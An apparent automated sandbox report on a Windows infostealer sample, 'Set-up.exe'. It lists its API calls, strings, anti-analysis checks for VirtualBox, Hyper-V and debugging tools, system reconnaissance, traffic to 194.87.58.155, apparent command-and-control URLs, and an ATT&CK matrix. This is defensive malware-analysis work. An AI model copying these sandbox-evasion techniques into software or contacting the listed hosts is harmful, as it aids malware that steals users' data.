Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00A710E60_2_00A710E6
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00C3F0400_2_00C3F040
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DBF0100_2_00DBF010
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00C630200_2_00C63020
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00C3D1D00_2_00C3D1D0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00C311900_2_00C31190
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00C511000_2_00C51100
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B811400_2_00B81140
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00AFB2D00_2_00AFB2D0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00BED2300_2_00BED230
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00D033F00_2_00D033F0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00C4B3F00_2_00C4B3F0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DDB3800_2_00DDB380
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00BE73100_2_00BE7310
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00C3B4B00_2_00C3B4B0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DD74A00_2_00DD74A0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B834500_2_00B83450
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DCD4300_2_00DCD430
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DCF4300_2_00DCF430
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DB35C00_2_00DB35C0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00ACF5B00_2_00ACF5B0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DC55E00_2_00DC55E0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00A6D5C00_2_00A6D5C0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DD35B00_2_00DD35B0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00C4F5B00_2_00C4F5B0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DB56D00_2_00DB56D0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DDB6F00_2_00DDB6F0
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00AA5340 appears 31 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00A675A0 appears 413 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00B79720 appears 31 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00C3CA40 appears 73 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00A671E0 appears 34 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00C17220 appears 659 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00B444A0 appears 64 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00AA4F40 appears 222 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00C17120 appears 45 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00AA4FD0 appears 157 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00A673F0 appears 78 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00C3CBC0 appears 397 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00C3A170 appears 40 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00C17310 appears 41 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00A6CAA0 appears 41 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00AA50A0 appears 35 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00C3C9B0 appears 70 times
Source: Set-up.exeStatic PE information: invalid certificate
Source: Set-up.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: Set-up.exeBinary string: Lntdll.dllNtCreateFileNtDeviceIoControlFileNtCancelIoFileEx\Device\Afd
Source: classification engineClassification label: mal68.troj.spyw.evad.winEXE@1/0@8/2
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00A7D090 GetLastError,_errno,__sys_nerr,__sys_errlist,FormatMessageW,wcstombs,strchr,strlen,strcpy,strrchr,strrchr,_errno,GetLastError,SetLastError,_errno,_errno,GetLastError,0_2_00A7D090
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00A6255D GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,GetDiskFreeSpaceExA,strlen,EnumDisplayMonitors,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,SHGetKnownFolderPath,wcscpy,wcscat,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,K32EnumProcesses,GetTickCount64,0_2_00A6255D
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00A629FF FindFirstFileA,FindFirstFileA,RegOpenKeyExA,RegOpenKeyExA,GetModuleFileNameA,CharUpperA,CharUpperA,strstr,CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,OpenProcess,QueryFullProcessImageNameA,QueryFullProcessImageNameA,CharUpperA,CloseHandle,CloseHandle,strstr,CreateToolhelp32Snapshot,Process32First,strncpy,_strlwr_s,strstr,strstr,strstr,strstr,CloseHandle,Process32Next,CloseHandle,CloseHandle,EnumWindows,EnumWindows,GetTickCount64,0_2_00A629FF
Source: C:\Users\user\Desktop\Set-up.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: Set-up.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Set-up.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Set-up.exeReversingLabs: Detection: 26%
Source: Set-up.exeString found in binary or memory: id-cmc-addExtensions
Source: Set-up.exeString found in binary or memory: set-addPolicy
Source: Set-up.exeString found in binary or memory: in-addr.arpa
Source: Set-up.exeString found in binary or memory: t xml:space=.gif" border="0"</body> </html> overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script> /favicon.ico" />operating system" style="width:1target="_blank">State Universitytext-align:left; document.write(, including the around t
Source: Set-up.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: Set-up.exeString found in binary or memory: iphlpapi.dllif_nametoindexkernel32LoadLibraryExA\/AddDllDirectorysystem_win32.c@
Source: Set-up.exeString found in binary or memory: in-addr.arpa
Source: Set-up.exeString found in binary or memory: 8L0123456789abcdefin-addr.arpaip6.arpa
Source: Set-up.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: Set-up.exeString found in binary or memory: JM[\Unable to allocate space for channel dataFailed allocating memory for channel type nameUnable to allocate temporary space for packetWould block sending channel-open requestUnable to send channel-open requestWould blockUnexpected errorUnexpected packet sizeChannel open failure (administratively prohibited)Channel open failure (connect failed)Channel open failure (unknown channel type)Channel open failure (resource shortage)Channel open failureUnable to allocate memory for setenv packetcancel-tcpip-forwardWould block sending forward requestUnable to send global-request packet for forward listen requestauth-agent-req@openssh.comauth-agent-reqcdChannel can not be reusedUnable to allocate memory for channel-process requestWould block sending channel requestUnable to send channel requestFailed waiting for channel successUnable to complete request for channel-process-startupUnexpected packet lengthUnable to allocate memory for signal nameWould block sending window adjustUnable to send transfer-window adjustment packet, deferringtransport readwould blockWe have already closed this channelEOF has already been received, data might be ignoredFailure while draining incoming flowUnable to send channel dataUnable to send EOF, but closing channel anywayWould block sending close-channelUnable to send close-channel request, but closing anywaysessionchannel.cUnable to allocate memory for direct-tcpip connectiondirect-tcpipUnable to allocate memory for direct-streamlocal connectiondirect-streamlocal@openssh.comQR0.0.0.0tcpip-forwardWould block sending global-request packet for forward listen requestUnknownUnable to allocate memory for listener queueUnable to complete request for forward-listenWould block waiting for packetChannel not foundcdenvWould block sending setenv requestUnable to send channel-request packet for setenv requestFailed getting response for channel-setenvUnable to complete request for channel-setenvcdWould block sending auth-agent requestUnable to send auth-agent requestFailed to request auth-agentUnable to complete request for auth-agentcdterm + mode lengths too largepty-reqWould block sending pty requestUnable to send pty-request packetFailed to require the PTY packageUnable to complete request for channel request-ptywindow-changeWould block sending window-change requestUnable to send window-change packetcdUnable to allocate memory for pty-requestx11-reqMIT-MAGIC-COOKIE-1Unable to get random bytes for x11-req cookie%02XWould block sending X11-req packetUnable to send x11-req packetwaiting for x11-req response packetUnable to complete request for channel x11-reqWould block sending EOFUnable to send EOF on channelReceiving channel window has been exhausted_libssh2_transport_read() bailed out!libssh2_channel_wait_closed() invoked when channel is not in EOF stateUnable to allocate memory for signal requestsignalWould block sending signal requestUnable to send signal packetecdsa-sha2-nistp256ecdsa-sha2-nistp384ecdsa-sha2-nistp521blocksize <= siz
Source: Set-up.exeString found in binary or memory: id-cmc-addExtensions
Source: Set-up.exeString found in binary or memory: set-addPolicy
Source: Set-up.exeString found in binary or memory: overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script>
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: kernel.appcore.dllJump to behavior
Source: Set-up.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: Set-up.exeStatic file information: File size 7101064 > 1048576
Source: Set-up.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x4e5c00
Source: Set-up.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x151c00
Source: Set-up.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DF8D9A LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,__acrt_iob_func,fwrite,FreeLibrary,__acrt_iob_func,fwrite,__acrt_iob_func,fwrite,FreeLibrary,__acrt_iob_func,fwrite,FreeLibrary,__acrt_iob_func,fwrite,0_2_00DF8D9A
Source: Set-up.exeStatic PE information: section name: .eh_fram
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DE41D0 push eax; mov dword ptr [esp], edx0_2_00DE41D5
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00C80300 push eax; mov dword ptr [esp], 00000000h0_2_00C80305
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00ADC6D0 push eax; mov dword ptr [esp], edx0_2_00ADC6D5
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B08640 push eax; mov dword ptr [esp], edx0_2_00B08645
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B1C7F0 push eax; mov dword ptr [esp], 00000000h0_2_00B1C743
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00AA0AC0 push eax; mov dword ptr [esp], 00000000h0_2_00AA0AC4
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00BC1130 push eax; mov dword ptr [esp], edx0_2_00BC1135
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00AC1430 push eax; mov dword ptr [esp], 00000000h0_2_00AC1433

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\Set-up.exeCode function: C:\Windows\System32\VBox*.dll vbox_first SYSTEM\ControlSet001\Services\VBoxSF vbox_second 0_2_00A629FF
Source: Set-up.exeBinary or memory string: PROCMON.EXE
Source: Set-up.exeBinary or memory string: X64DBG.EXE
Source: Set-up.exeBinary or memory string: WINDBG.EXE
Source: Set-up.exeBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: Set-up.exeBinary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00A629FF FindFirstFileA,FindFirstFileA,RegOpenKeyExA,RegOpenKeyExA,GetModuleFileNameA,CharUpperA,CharUpperA,strstr,CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,OpenProcess,QueryFullProcessImageNameA,QueryFullProcessImageNameA,CharUpperA,CloseHandle,CloseHandle,strstr,CreateToolhelp32Snapshot,Process32First,strncpy,_strlwr_s,strstr,strstr,strstr,strstr,CloseHandle,Process32Next,CloseHandle,CloseHandle,EnumWindows,EnumWindows,GetTickCount64,0_2_00A629FF
Source: C:\Users\user\Desktop\Set-up.exeAPI coverage: 7.9 %
Source: C:\Users\user\Desktop\Set-up.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00A6255D GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,GetDiskFreeSpaceExA,strlen,EnumDisplayMonitors,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,SHGetKnownFolderPath,wcscpy,wcscat,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,K32EnumProcesses,GetTickCount64,0_2_00A6255D
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00A629FF FindFirstFileA,FindFirstFileA,RegOpenKeyExA,RegOpenKeyExA,GetModuleFileNameA,CharUpperA,CharUpperA,strstr,CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,OpenProcess,QueryFullProcessImageNameA,QueryFullProcessImageNameA,CharUpperA,CloseHandle,CloseHandle,strstr,CreateToolhelp32Snapshot,Process32First,strncpy,_strlwr_s,strstr,strstr,strstr,strstr,CloseHandle,Process32Next,CloseHandle,CloseHandle,EnumWindows,EnumWindows,GetTickCount64,0_2_00A629FF
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00C3E270 _errno,FindNextFileW,WideCharToMultiByte,strlen,_errno,calloc,MultiByteToWideChar,MultiByteToWideChar,_errno,GetLastError,MultiByteToWideChar,wcscpy,FindFirstFileW,free,_errno,0_2_00C3E270
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00A6255D GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,GetDiskFreeSpaceExA,strlen,EnumDisplayMonitors,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,SHGetKnownFolderPath,wcscpy,wcscat,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,K32EnumProcesses,GetTickCount64,0_2_00A6255D
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00A6255D GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,GetDiskFreeSpaceExA,strlen,EnumDisplayMonitors,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,SHGetKnownFolderPath,wcscpy,wcscat,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,K32EnumProcesses,GetTickCount64,0_2_00A6255D
Source: Set-up.exeBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: Set-up.exeBinary or memory string: Hyper-V RAW
Source: Set-up.exeBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Set-up.exe, 00000000.00000003.1693512954.00000000006F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: oY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFsion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}00000FF1CE}\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}
Source: Set-up.exe, 00000000.00000003.1793675979.00000000013ED000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1793748047.00000000013F6000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1793963248.000000000140B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1795591258.000000000140C000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1793878281.00000000013F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\Set-up.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00A629FF FindFirstFileA,FindFirstFileA,RegOpenKeyExA,RegOpenKeyExA,GetModuleFileNameA,CharUpperA,CharUpperA,strstr,CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,OpenProcess,QueryFullProcessImageNameA,QueryFullProcessImageNameA,CharUpperA,CloseHandle,CloseHandle,strstr,CreateToolhelp32Snapshot,Process32First,strncpy,_strlwr_s,strstr,strstr,strstr,strstr,CloseHandle,Process32Next,CloseHandle,CloseHandle,EnumWindows,EnumWindows,GetTickCount64,0_2_00A629FF
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DF8D9A LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,__acrt_iob_func,fwrite,FreeLibrary,__acrt_iob_func,fwrite,__acrt_iob_func,fwrite,FreeLibrary,__acrt_iob_func,fwrite,FreeLibrary,__acrt_iob_func,fwrite,0_2_00DF8D9A
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00A6116C Sleep,Sleep,SetUnhandledExceptionFilter,_set_invalid_parameter_handler,__p__acmdln,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA,_cexit,_initterm,exit,0_2_00A6116C
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00A611A3 Sleep,SetUnhandledExceptionFilter,_set_invalid_parameter_handler,__p__acmdln,malloc,strlen,malloc,memcpy,0_2_00A611A3
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00A61160 Sleep,SetUnhandledExceptionFilter,_set_invalid_parameter_handler,__p__acmdln,malloc,strlen,malloc,memcpy,0_2_00A61160
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00A613C9 SetUnhandledExceptionFilter,_set_invalid_parameter_handler,__p__acmdln,malloc,strlen,malloc,memcpy,_initterm,0_2_00A613C9
Source: C:\Users\user\Desktop\Set-up.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00C493D0 GetSystemTime,SystemTimeToFileTime,0_2_00C493D0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00F3C070 GetVersion,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,GetLastError,__acrt_iob_func,_time32,GetLastError,__acrt_iob_func,0_2_00F3C070
Source: C:\Users\user\Desktop\Set-up.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: Set-up.exe, Set-up.exe, 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: procmon.exe
Source: Set-up.exe, Set-up.exe, 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: wireshark.exe

Stealing of Sensitive Information

barindex
Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
Source: global trafficTCP traffic: 192.168.2.4:49731 -> 194.87.58.155:80
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00A9A550 setsockopt,_errno,_errno,_errno,_errno,setsockopt,WSAGetLastError,getsockopt,setsockopt,strlen,htons,getsockopt,setsockopt,WSAGetLastError,WSAGetLastError,strchr,htons,bind,WSAGetLastError,htons,bind,WSAGetLastError,htons,strtoul,0_2_00A9A550
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B2AA30 htons,htons,socket,ioctlsocket,setsockopt,setsockopt,htonl,bind,setsockopt,setsockopt,connect,WSAGetLastError,closesocket,0_2_00B2AA30
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00AAE480 strlen,strchr,strchr,strchr,strtoul,strchr,strtoul,memcpy,getsockname,WSAGetLastError,WSAGetLastError,memcpy,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,bind,htons,bind,WSAGetLastError,getsockname,listen,listen,WSAGetLastError,htons,0_2_00AAE480
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter
1
DLL Side-Loading
1
DLL Side-Loading
1
Virtualization/Sandbox Evasion
OS Credential Dumping1
System Time Discovery
Remote Services11
Archive Collected Data
21
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Native API
Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Deobfuscate/Decode Files or Information
LSASS Memory221
Security Software Discovery
Remote Desktop Protocol1
Data from Local System
4
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
Obfuscated Files or Information
Security Account Manager1
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive4
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS12
Process Discovery
Distributed Component Object ModelInput Capture5
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
Remote System Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials2
File and Directory Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync17
System Information Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
Set-up.exe26%ReversingLabsWin32.Infostealer.Tinba
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://home.eleventj11vt.top/jQURilAbAxjhrGAaBiUq17355787165a10%Avira URL Cloudsafe
http://home.eleventj11vt.top/jQURilAbAxjhrGAaBiUq17355787160%Avira URL Cloudsafe
http://home.eleventj11vt.top/jQURilAbAxjhrGAaBiUq1735578716fd40%Avira URL Cloudsafe
http://home.eleventj11vt.top/jQURilAbAxjhrGAaBiUq1735578716http://home.eleventj11vt.top/jQURilAbAxjh0%Avira URL Cloudsafe
http://home.eleventj11vt.top/jQ30%Avira URL Cloudsafe
http://home.eleventj11vt.top/jQURilAbAxjhrGAaBiUq1735578716?argument=00%Avira URL Cloudsafe
http://home.eleventj11vt.top/jQ0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
home.eleventj11vt.top
194.87.58.155
truetrue
    unknown
    httpbin.org
    52.202.253.164
    truefalse
      high
      NameMaliciousAntivirus DetectionReputation
      http://home.eleventj11vt.top/jQURilAbAxjhrGAaBiUq1735578716true
      • Avira URL Cloud: safe
      unknown
      http://home.eleventj11vt.top/jQURilAbAxjhrGAaBiUq1735578716?argument=0true
      • Avira URL Cloud: safe
      unknown
      https://httpbin.org/ipfalse
        high
        NameSourceMaliciousAntivirus DetectionReputation
        https://curl.se/docs/hsts.htmlSet-up.exefalse
          high
          http://html4/loose.dtdSet-up.exefalse
            high
            http://home.eleventj11vt.top/jQ3Set-up.exe, 00000000.00000003.1793675979.00000000013ED000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1793748047.00000000013F6000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1793963248.000000000140B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1795591258.000000000140C000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1793878281.00000000013F7000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://home.eleventj11vt.top/jQURilAbAxjhrGAaBiUq1735578716fd4Set-up.exe, 00000000.00000003.1793675979.00000000013ED000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1795571963.00000000013FB000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1793748047.00000000013F6000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1793878281.00000000013F7000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
